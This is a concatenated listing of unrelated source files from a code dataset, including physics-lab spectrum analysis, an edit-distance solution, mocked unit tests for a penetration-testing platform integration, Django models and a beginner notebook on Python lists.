result_set_train_standard = standardScaler.transform(result_set_train)
standardScaler.fit(result_set_test)
result_set_test_standard = standardScaler.transform(result_set_test)
print("============================training")
clf = svm.SVC(max_iter=-1)
start = time.time()
print("result_set_train.shape: ", result_set_train_standard.shape)
print("label_set_train.shape: ", label_set_train.shape)
clf.fit(result_set_train_standard, label_set_train)
t = time.time() - start
print("train time:", t)
print("============================testing")
# Test on Training data
print("result_set_test.shape: ", result_set_test_standard.shape)
print("label_set_test.shape: ", label_set_test.shape)
test_result = clf.predict(result_set_test_standard)
accuracy = sum(test_result == label_set_test) / label_set_test.shape[0]
print('Test accuracy: ', accuracy)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='image production training')
parser.add_argument('--device_target', type=str, default='Ascend', choices=('Ascend', 'GPU'),
help='device where the code will be implemented (default: Ascend)')
parser.add_argument('--device_id', type=int, default=0, help='device id of GPU or Ascend. (Default: 0)')
args = parser.parse_args()
device_target = args.device_target
device_id = args.device_id
context.set_context(mode=context.GRAPH_MODE, device_target=device_target, save_graphs=False, device_id=device_id)
print("============================verify_cifar10")
verify_cifar10()
| 41.818182 | 117 | 0.7 |
935fec1ff1cb0ca01485e176912022487eea1a96
| 4,960 |
py
|
Python
|
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | 2 |
2019-03-07T08:55:36.000Z
|
2019-04-22T18:13:03.000Z
|
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | null | null | null |
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
|
smjhnits/Praktikum
|
92c9df3ee7dfa2417f464036d18ac33b70765fdd
|
[
"MIT"
] | 2 |
2017-10-27T13:26:43.000Z
|
2018-01-13T09:12:24.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import uncertainties
from scipy.signal import find_peaks
from scipy.optimize import curve_fit
import scipy.constants as sc
import scipy.integrate as integrate
from uncertainties import ufloat
from uncertainties import unumpy as unp
from uncertainties.unumpy import nominal_values as nomval
from uncertainties.unumpy import std_devs as std
# Loading experimental data and results of further calculations
# Detector geometry in metres: r is half the 45 mm aperture, L the
# source-to-crystal distance -- assumed from the setup sketch; TODO confirm
# against the lab protocol.
r = 0.5*45*10**(-3)
L = (73.5+15)*10**(-3)
# Fractional solid angle subtended by the detector as seen from the source.
Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2))
# Channel counts of the unknown sample's spectrum.
C_u2 = np.genfromtxt('2018-12-10_Nitschke_Pape/Probe_21.Spe', unpack = True)
# Europium calibration peaks and their efficiencies from a previous analysis.
Peaks_Eu, Q_Eu = np.genfromtxt('EuropiumQ.txt', unpack = True)
# Channel axis for the first 4000 channels.
Channels = np.linspace(0,len(C_u2[:4000])-1, len(C_u2[:4000]))
# Linear energy calibration and power-law efficiency fit parameters together
# with their covariance columns, produced by the Europium calibration script.
params_energy, covariance_energy_0, covariance_energy_1, params_Q, covariance_Q_0, covariance_Q_1= np.genfromtxt('Europium.txt', unpack = True)
covariance_energy = np.array([covariance_energy_0, covariance_energy_1])
# 1-sigma uncertainties from the diagonal of the covariance matrices.
errors_energy = np.sqrt(np.diag(covariance_energy))
covariance_Q = np.array([covariance_Q_0,covariance_Q_1])
errors_Q = np.sqrt(np.diag(covariance_Q))
def Energy(C):
    """Map a channel number to an energy via the linear calibration fit,
    propagating the fit-parameter uncertainties."""
    slope = ufloat(params_energy[0], errors_energy[0])
    intercept = ufloat(params_energy[1], errors_energy[1])
    return slope * C + intercept
def Gauss(x, A, xmu, sigma, B):
    """Gaussian with amplitude A, centre xmu, width sigma and offset B."""
    z = (x - xmu) / sigma
    return A * np.exp(-0.5 * z ** 2) + B
def Gauss_Ufloat(x, A, xmu, sigma):
    """Offset-free Gaussian evaluated with uncertainty propagation (unp)."""
    exponent = -0.5 * (x - xmu) ** 2 / sigma ** 2
    return A * unp.exp(exponent)
def AreaGaus(A, sigma):
    """Analytic area under a Gaussian of amplitude A and width sigma."""
    return A * sigma * np.sqrt(2.0 * np.pi)
def Efficiency(E):
    """Power-law detection efficiency Q(E) = a * E**b from the Europium fit,
    with the fit-parameter uncertainties propagated."""
    scale = ufloat(params_Q[0], errors_Q[0])
    exponent = ufloat(params_Q[1], errors_Q[1])
    return scale * E ** exponent
# Restrict the analysis to the first 4000 channels; tges is the measurement
# time used later to normalise peak areas (units per spectrometer export --
# presumably seconds; TODO confirm).
Spektrum = C_u2[:4000]
tges = 4046
# Candidate photo peaks: local maxima above a fixed count threshold.
Peaks = find_peaks(Spektrum, height = 120)
# Plot the full spectrum on the calibrated energy axis with the peaks marked.
plt.clf()
plt.hist(unp.nominal_values(Energy(np.arange(0, len(Spektrum[0:4000]), 1))),
         bins=unp.nominal_values(Energy(np.linspace(0, len(Spektrum[0:4000]), len(Spektrum[0:4000])))),
         weights=Spektrum[0:4000], label='Spektrum')
plt.yscale('log')
plt.plot(nomval(Energy(Peaks[0][:])), Spektrum[Peaks[0][:]], '.',
         markersize=4, label='Gauß-Peaks', color='C1', alpha=0.8)
plt.xlim(0,1500)
plt.ylabel('Zählungen pro Energie')
plt.xlabel('E / keV')
plt.legend()
#plt.show()
plt.savefig('Plots/unbekannt2.pdf')
# Peak positions in energy and the literature values for comparison
# (1173/1332 keV -- the well-known Co-60 lines).
Peaks_Energy = Energy(Peaks[0][:])
Energy_co = np.array([1173.237, 1332.501])
# Fit a Gaussian (with offset) in a +-30 channel window around each peak and
# collect the parameters and their 1-sigma errors.
Params_u2 = []
errors_u2 = []
for n in Peaks[0]:
    Params, covariance = curve_fit(Gauss, Channels[n-30:n+30], Spektrum[n-30:n+30], p0 = [C_u2[n], n, 1, 0])
    Params_u2.append(Params.tolist())
    errors = np.sqrt(np.diag(covariance))
    errors_u2.append(errors.tolist())
# Plot every fitted peak window together with its Gaussian fit curve.
for i,n in enumerate(Peaks[0]):
    # Window bounds as plain integers. BUG FIX: the original used np.int(),
    # an alias deprecated in NumPy 1.20 and removed in NumPy 1.24, which
    # raises AttributeError on current NumPy; the builtin int() is equivalent.
    l_u = int(Channels[n-30])
    l_o = int(Channels[n+30])
    plt.clf()
    plt.hist(unp.nominal_values(Energy(np.arange(l_u, l_o, 1))),
             bins=unp.nominal_values(Energy(np.linspace(l_u, l_o, len(Spektrum[n-30:n+30])))),
             weights=Spektrum[n-30:n+30], label='Spektrum')
    # Smooth channel grid for drawing the fitted Gaussian over the histogram.
    Channel_Gauss = np.linspace(n-30,n+30,1000)
    plt.plot(unp.nominal_values(Energy(Channel_Gauss)), Gauss(Channel_Gauss,*Params_u2[i]))
    #plt.show()
# Unpack the fit parameters into plain arrays and ufloat arrays carrying the
# 1-sigma fit errors (columns: 0=amplitude, 1=mean, 2=sigma, 3=offset).
Peaks_mittel = np.round(np.asarray(Params_u2)[:,1],0)
Amplitudes = np.asarray(Params_u2)[:,0]
Amplitudes_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,0]) for i,n in enumerate(np.asarray(Params_u2)[:,0])])
Means_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,1]) for i,n in enumerate(np.asarray(Params_u2)[:,1])])
sigmas = np.asarray(Params_u2)[:,2]
sigmas_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,2]) for i,n in enumerate(np.asarray(Params_u2)[:,2])])
# (amplitude, sigma) pairs feeding the analytic Gaussian area formula.
Area_Params = np.array([[n,sigmas[i]] for i,n in enumerate(Amplitudes)])
Area_params_ufloat = np.array([[n,sigmas_ufloat[i]] for i,n in enumerate(Amplitudes_ufloat)])
Constants_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,3]) for i,n in enumerate(np.asarray(Params_u2)[:,3])])
print("--- Find Peaks and gaussian fit---")
print(f"Channel Peaks: {np.round(Peaks_mittel,0)}")
#print(f"Energy Peaks: {Energy(np.round(Peaks_mittel,0))}")
print(f"Energy Literature: {Energy_co}", '\n')
# Peak areas (counts) and count rates normalised by the measurement time.
Area = AreaGaus(Area_Params[:,0], Area_Params[:,1])
Area_ufloat = AreaGaus(Area_params_ufloat[:,0], Area_params_ufloat[:,1])
Area_norm = Area/tges
Area_norm_ufloat = Area_ufloat/tges
print("-- Fit Parameter --")
print(f"Amplituden: {Amplitudes_ufloat}")
print(f"Means: {Energy(Means_ufloat)}")
print(f"Sigmas: {sigmas_ufloat}")
print(f"Constants: {Constants_ufloat}", '\n')
print("--- Calculating the activity ---")
# NOTE(review): r, L and Omega are recomputed here with exactly the same
# values as at the top of the script -- redundant, kept for byte-identity.
r = 0.5*45*10**(-3)
L = (73.5+15)*10**(-3)
Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2))
# Emission probabilities per decay for the two lines (literature values --
# presumably Co-60; TODO confirm source).
W = np.asarray([0.999736, 0.999856])
Q = Efficiency(Peaks_Energy)
# Activity A = rate / (emission probability * efficiency * solid angle).
Aktivität = np.array([Area_norm[i]/(W[i]*n*Omega) for i,n in enumerate(Q)])
print(f"emission probability: {W}")
print(f"Area under Gaussian Fit: {Area_ufloat}")
print(f"Efficiency: {Q}", '\n')
print(f"resulting acitivity: {Aktivität}")
A_all = sum(Aktivität)/len(Aktivität)#ufloat(np.mean(nomval(Aktivität)),np.std(std(Aktivität)))
print(f"Mean with all values: {nomval(A_all)}, {std(A_all)}")
| 38.75 | 143 | 0.703831 |
35813f5601c81a9ccc7791e5578db64b1a5ddd91
| 1,684 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
from ch07_recursion_advanced.intro.decorator_utils import decorate_with_memo_shorter
def edit_distance(str1, str2):
    """Return the edit distance between str1 and str2, case-insensitively."""
    left = str1.lower()
    right = str2.lower()
    return __edit_distance_helper(left, right, len(left) - 1, len(right) - 1)
@decorate_with_memo_shorter
def __edit_distance_helper(str1, str2, pos1, pos2):
    """Memoized Levenshtein recursion over the prefixes str1[:pos1+1] and
    str2[:pos2+1]."""
    # Base cases: once one string is exhausted (position below 0), the
    # distance is the number of characters still remaining in the other
    # string, i.e. pos + 1.
    # BUG FIX: the original used `pos1 <= 0: return pos2` (and symmetrically
    # for pos2), which skipped comparing the character at index 0 and
    # undercounted by one -- e.g. ("x", "abc") yielded 2 instead of 3, and
    # two empty strings yielded -1.
    if pos1 < 0:
        return pos2 + 1
    if pos2 < 0:
        return pos1 + 1
    # Matching characters cost nothing; recurse on both prefixes.
    if str1[pos1] == str2[pos2]:
        # recursive descent
        return __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1)
    else:
        # try insert, delete and change
        insert_in_first = __edit_distance_helper(str1, str2, pos1, pos2 - 1)
        delete_in_first = __edit_distance_helper(str1, str2, pos1 - 1, pos2)
        change = __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1)
        # minimum of all three variants + 1
        return 1 + min(insert_in_first, delete_in_first, change)
def main():
    """Print the edit distance for a handful of sample word pairs."""
    word_pairs = [("Micha", "Michael"),
                  ("Ananas", "Banane"),
                  ("sunday-Night-Mic", "saturday-Morning-Mi"),
                  ("sunday-Night-Mike", "saturday-Morning-Micha")]
    print("With memoization")
    for first, second in word_pairs:
        print(first, " -> ", second,
              " edits: ", str(edit_distance(first, second)))


if __name__ == "__main__":
    main()
| 31.773585 | 84 | 0.630641 |
35a7447d0590910a82fcc439dcd665a03532eabe
| 6,911 |
py
|
Python
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
import jwt
from Pcysys import Client, pentera_run_template_command, pentera_get_task_run_status_command, \
pentera_get_task_run_full_action_report_command, pentera_authentication
# File name expected for the generated full-action-report CSV entry.
MOCK_PENTERA_FULL_ACTION_REPORT = 'penterascan-5e4530961deb8eda82b08730.csv'
# BUG FIX: the original `open(...).read()` never closed the file handle
# (ResourceWarning at import time); a context manager closes it deterministically.
with open('TestData/mock_csv_file', 'r') as _mock_csv_file:
    MOCK_CSV = _mock_csv_file.read()
# Canned response of the Pentera /auth/token endpoint.
MOCK_AUTHENTICATION = {
    "token": "TOKEN",
    "tgt": "TGT"
}
# Fixed token expiry timestamp used by every mocked integration context.
MOCK_AUTHENTICATION_EXP = 1579763364
# Canned payload returned by the "run template" endpoint.
MOCK_RUN_TEMPLATE = {
    "taskRuns": [
        {
            "status": "Running",
            "taskRunId": "5e41923cf24e1f99979b1cb4",
            "taskRunName": "Test mock task run name",
            "startTime": 1581348380358.0,
            "endTime": 1581349123973.0,
        }
    ],
}
# Canned payload for the task-run status endpoint (same taskRunId as above).
MOCK_TASK_RUN_STATS = {
    "taskRuns": [
        {
            "taskRunId": "5e41923cf24e1f99979b1cb4",
            "taskRunName": "Test mock task run name",
            "startTime": 1581348380358.0,
            "endTime": 1581349123973.0,
            "status": "Warning"
        }
    ]
}
def test_pentera_get_task_run_full_action_report(mocker, requests_mock):
    """The full-action-report command should return a CSV file entry plus a
    context entry whose rows come from the mocked report CSV."""
    # Integration parameters and a pre-authenticated integration context.
    mocker.patch.object(demisto, 'params', return_value={
        'url': 'https://pentera.com',
        'port': '8181'
    })
    mocker.patch.object(demisto, 'getIntegrationContext', return_value={
        'base_url': 'https://pentera.com',
        'tgt': 'omgNewTGT',
        'accessToken': 'omgNewSecret',
        'expiry': MOCK_AUTHENTICATION_EXP
    })
    mocker.patch.object(demisto, 'args', return_value={
        'task_run_id': '5e4530961deb8eda82b08730'
    })
    # The report endpoint answers with the canned CSV text.
    requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e4530961deb8eda82b08730/fullActionReportCSV',
                      text=MOCK_CSV)
    # Build the client exactly as the integration's main() does.
    client_id = demisto.params().get('clientId')
    tgt = demisto.params().get('tgt')
    base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
    verify_certificate = not demisto.params().get('insecure', False)
    proxy = demisto.params().get('proxy', False)
    args = demisto.args()
    client = Client(
        base_url=base_url,
        tgt=tgt,
        verify=verify_certificate,
        client_id=client_id,
        proxy=proxy,
        headers={'Accept': 'application/json'})
    entries = pentera_get_task_run_full_action_report_command(client, args)
    # Entry 0 is the raw CSV file, entry 1 the parsed context data.
    raw_csv_file_name = entries[0]['File']
    assert raw_csv_file_name == MOCK_PENTERA_FULL_ACTION_REPORT
    task_run_id = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['ID']
    assert task_run_id == '5e4530961deb8eda82b08730'
    operation_type = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['FullActionReport'][0][
        'Operation Type']
    assert operation_type == 'BlueKeep (CVE-2019-0708) Vulnerability Discovery'
def test_pentera_get_task_run_stats(mocker, requests_mock):
    """The task-run status command should place the mocked task-run ID into
    the Pentera.TaskRun context entry."""
    # Integration parameters and a pre-authenticated integration context.
    mocker.patch.object(demisto, 'params', return_value={
        'url': 'https://pentera.com',
        'port': '8181'
    })
    mocker.patch.object(demisto, 'getIntegrationContext', return_value={
        'base_url': 'https://pentera.com',
        'tgt': 'omgNewTGT',
        'accessToken': 'omgNewSecret',
        'expiry': MOCK_AUTHENTICATION_EXP
    })
    mocker.patch.object(demisto, 'args', return_value={
        'task_run_id': '5e41923cf24e1f99979b1cb4'
    })
    # The taskRun endpoint answers with the canned task-run payload.
    requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e41923cf24e1f99979b1cb4',
                      json=MOCK_RUN_TEMPLATE)
    # Build the client exactly as the integration's main() does.
    client_id = demisto.params().get('clientId')
    tgt = demisto.params().get('tgt')
    base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
    verify_certificate = not demisto.params().get('insecure', False)
    proxy = demisto.params().get('proxy', False)
    args = demisto.args()
    client = Client(
        base_url=base_url,
        tgt=tgt,
        verify=verify_certificate,
        client_id=client_id,
        proxy=proxy,
        headers={'Accept': 'application/json'})
    readable, parsed, raw = pentera_get_task_run_status_command(client, args)
    # MOCK_TASK_RUN_STATS shares its taskRunId with MOCK_RUN_TEMPLATE.
    assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['ID'] == MOCK_TASK_RUN_STATS['taskRuns'][0]['taskRunId']
def test_pentera_run_template(mocker, requests_mock):
    """The run-template command should surface the mocked task-run status in
    the Pentera.TaskRun context entry."""
    # Integration parameters and a pre-authenticated integration context.
    mocker.patch.object(demisto, 'params', return_value={
        'url': 'https://pentera.com',
        'port': '8181'
    })
    mocker.patch.object(demisto, 'getIntegrationContext', return_value={
        'base_url': 'https://pentera.com',
        'tgt': 'omgNewTGT',
        'accessToken': 'omgNewSecret',
        'expiry': MOCK_AUTHENTICATION_EXP
    })
    mocker.patch.object(demisto, 'args', return_value={
        'template_name': 'omgRunThisTemplate'
    })
    # The bulk-run endpoint answers with the canned task-run payload.
    requests_mock.post('https://pentera.com:8181/api/v1/template/runBulk', json=MOCK_RUN_TEMPLATE)
    # Build the client exactly as the integration's main() does.
    client_id = demisto.params().get('clientId')
    tgt = demisto.params().get('tgt')
    base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
    verify_certificate = not demisto.params().get('insecure', False)
    proxy = demisto.params().get('proxy', False)
    args = demisto.args()
    client = Client(
        base_url=base_url,
        tgt=tgt,
        verify=verify_certificate,
        client_id=client_id,
        proxy=proxy,
        headers={'Accept': 'application/json'})
    readable, parsed, raw = pentera_run_template_command(client, args)
    assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['Status'] == MOCK_RUN_TEMPLATE['taskRuns'][0]['status']
def test_pentera_authentication(mocker, requests_mock):
    """Authentication should store exactly one integration context containing
    the mocked access token and its expiry."""
    # Raw integration parameters (no pre-existing context this time).
    mocker.patch.object(demisto, 'params', return_value={
        'clientId': 'mmtzv',
        'tgt': 'omgSecretsWow',
        'url': 'https://pentera.com',
        'port': '8181'
    })
    # Bypass real JWT parsing; supply a fixed header with the expiry claim.
    mocker.patch.object(jwt, 'get_unverified_header',
                        return_value={'alg': 'HS256', 'exp': 1579763364, 'iat': 1579762464})
    requests_mock.post('https://pentera.com:8181/auth/token', json=MOCK_AUTHENTICATION)
    mocker.patch.object(demisto, 'args', return_value={})
    # Spy on the context write so the stored payload can be inspected below.
    mocker.patch.object(demisto, 'setIntegrationContext')
    # Build the client exactly as the integration's main() does.
    client_id = demisto.params().get('clientId')
    tgt = demisto.params().get('tgt')
    base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port']
    verify_certificate = not demisto.params().get('insecure', False)
    proxy = demisto.params().get('proxy', False)
    client = Client(
        base_url=base_url,
        tgt=tgt,
        verify=verify_certificate,
        client_id=client_id,
        proxy=proxy,
        headers={'Accept': 'application/json'})
    pentera_authentication(client)
    assert demisto.setIntegrationContext.call_count == 1
    # First positional argument of the single call is the stored context dict.
    integration_context = demisto.setIntegrationContext.call_args[0][0]
    assert isinstance(integration_context, dict)
    assert integration_context['expiry'] == MOCK_AUTHENTICATION_EXP
    assert integration_context['accessToken'] == MOCK_AUTHENTICATION['token']
| 39.045198 | 111 | 0.653017 |
ea220d728ed62d821c3fbebff00c689b1425b5f7
| 728 |
py
|
Python
|
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | 1 |
2021-04-02T17:43:48.000Z
|
2021-04-02T17:43:48.000Z
|
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | 1 |
2020-12-18T18:04:49.000Z
|
2020-12-18T18:04:49.000Z
|
# Задача 1. Вариант 30.
'''
Напишите программу, которая выводит имя "Илья Арнольдович Файзильберг",
и запрашивает его псевдоним. Программа должна сцеплять две эти строки
и выводить полученную строку, разделяя имя и псевдоним с помощью тире.
'''
# SHCHUKIN F. O.
# 24.02.2016
from sys import stdout as c
from time import sleep
# Full name of the writer and the quiz question built from it.
name = 'Илья Арнольдович Файнзильберг'
question = 'Какой псевдоним носил советский писатель ' + name + '?'
# Short pause before the question is typed out.
sleep(1.0)
def printer(text):
    """Type *text* to stdout one character at a time with a short delay,
    imitating a typewriter effect."""
    delay = 0.03
    for symbol in text:
        c.write(symbol)
        c.flush()
        sleep(delay)
# Type out the question, prompt for the pseudonym, then echo the full name
# joined with the entered pseudonym by a dash, as the task requires.
printer(question)
c.write('\n'*2)
answer = input('Ваш ответ: ')
c.write('\n'*2)
printer('Правильно: ' + name + ' - ' + answer)
c.write('\n'*2)
# Final prompt keeps the console window open until the user confirms.
input('ok')
| 22.060606 | 71 | 0.673077 |
17f132d4e7c624ad4fa893494275758b3a8be675
| 1,012 |
py
|
Python
|
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | 2 |
2021-02-03T02:03:21.000Z
|
2021-07-03T20:24:14.000Z
|
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | null | null | null |
S6/CS334-NPL/003c_shared_memory (005c).py
|
joe247/CSE-LABS
|
bab17548562bdc9c0bc8b15679f07379a9e98dec
|
[
"MIT"
] | null | null | null |
import multiprocessing
def square_list(mylist, result, square_sum):
    """Square each entry of *mylist* into the shared array *result* and store
    the sum of those squares in the shared value *square_sum*."""
    # Fill the shared array element by element.
    for position, value in enumerate(mylist):
        result[position] = value * value
    # Total of the squared values goes into the shared Value object.
    square_sum.value = sum(result)
    # Report what this (child) process sees.
    print(f'Result (in process p1): {result[:]}')
    print(f'Sum of squares (in process p1): {square_sum.value}')
if __name__ == "__main__":
    # Demonstrates multiprocessing shared memory: Array and Value live in
    # shared memory, so writes made in the child process are visible here.
    # input list
    mylist = [1,2,3,4]
    # creating Array of int data type with space for 4 integers
    result = multiprocessing.Array('i', 4)
    # creating Value of int data type
    square_sum = multiprocessing.Value('i')
    # creating new process
    p1 = multiprocessing.Process(target=square_list, args=(mylist, result, square_sum))
    # starting process
    p1.start()
    # wait until process is finished
    p1.join()
    # print result array
    print(f'Result (in main process): {result[:]}')
    # print square_sum Value
    print(f'Sum of squares (in main process): {square_sum.value}')
| 30.666667 | 84 | 0.718379 |
101e8f19fec5996b4135ab21dd8ee960a387292b
| 829 |
py
|
Python
|
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
FUNDASTORE/APPS/PRODUCTOS/models.py
|
GabrielB-07/FundaStore-cgb
|
b509a9743a651344b32dd7a40ab789f1db48e54b
|
[
"CC0-1.0"
] | null | null | null |
from django.db import models
# Create your models here.
class Categoria(models.Model):
    """Product category with its ITBMS tax rate."""
    # Explicit surrogate primary key.
    cat_id = models.AutoField(primary_key=True)
    cat_nombre = models.CharField(max_length=128)
    # ITBMS rate for the category -- presumably a percentage; confirm with
    # the business rules before relying on the unit.
    cat_itbms = models.DecimalField(max_digits=8,decimal_places=2)
    def __str__(self):
        return self.cat_nombre
class Producto(models.Model):
    """Store product: price, stock, category and a catalogue image."""
    # Explicit surrogate primary key.
    pro_id = models.AutoField(primary_key=True)
    pro_nombre = models.CharField(max_length=128)
    pro_precio = models.DecimalField(max_digits=8,decimal_places=2)
    pro_stock = models.IntegerField()
    pro_descripcion = models.TextField(null=True)
    # Deleting a Categoria cascades to its products.
    pro_categoria = models.ForeignKey(to=Categoria,on_delete=models.CASCADE,null=True)
    # Uploaded under MEDIA_ROOT/PRODUCTOS; falls back to a default image.
    pro_imagen = models.ImageField(upload_to='PRODUCTOS',max_length=128,default='default.png')
    def __str__(self):
        return self.pro_nombre
| 37.681818 | 94 | 0.75392 |
102b53d41bd2daccf298fd33e72a775ec553f087
| 10,181 |
py
|
Python
|
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Lists.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# lists are used to store a list of things; similar to arrays in java \n",
"# note the use of square brackets and\n",
"\n",
"a = [3, 10, -1]"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [],
"source": [
"# .append function adds your number to the list\n",
"\n",
"a.append(2)"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay']\n"
]
}
],
"source": [
"# list can contain numbers, text or other lists\n",
"\n",
"a.append(\"yayay\")\n",
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay', [6, 7]]\n"
]
}
],
"source": [
"a.append([6, 7])\n",
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[6, 7]"
]
},
"execution_count": 9,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a.pop()"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2, 'yayay']\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"'yayay'"
]
},
"execution_count": 11,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a.pop()"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[3, 10, -1, 2, 2]\n"
]
}
],
"source": [
"print(a)"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"3"
]
},
"execution_count": 13,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[0]"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"2"
]
},
"execution_count": 14,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[3]"
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"-1"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"a[2]\n"
]
},
{
"cell_type": "code",
"execution_count": 16,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"-1\n"
]
}
],
"source": [
"print(a[2])"
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [],
"source": [
"a[0] = 4.55"
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[4.55, 10, -1, 2, 2]\n"
]
}
],
"source": [
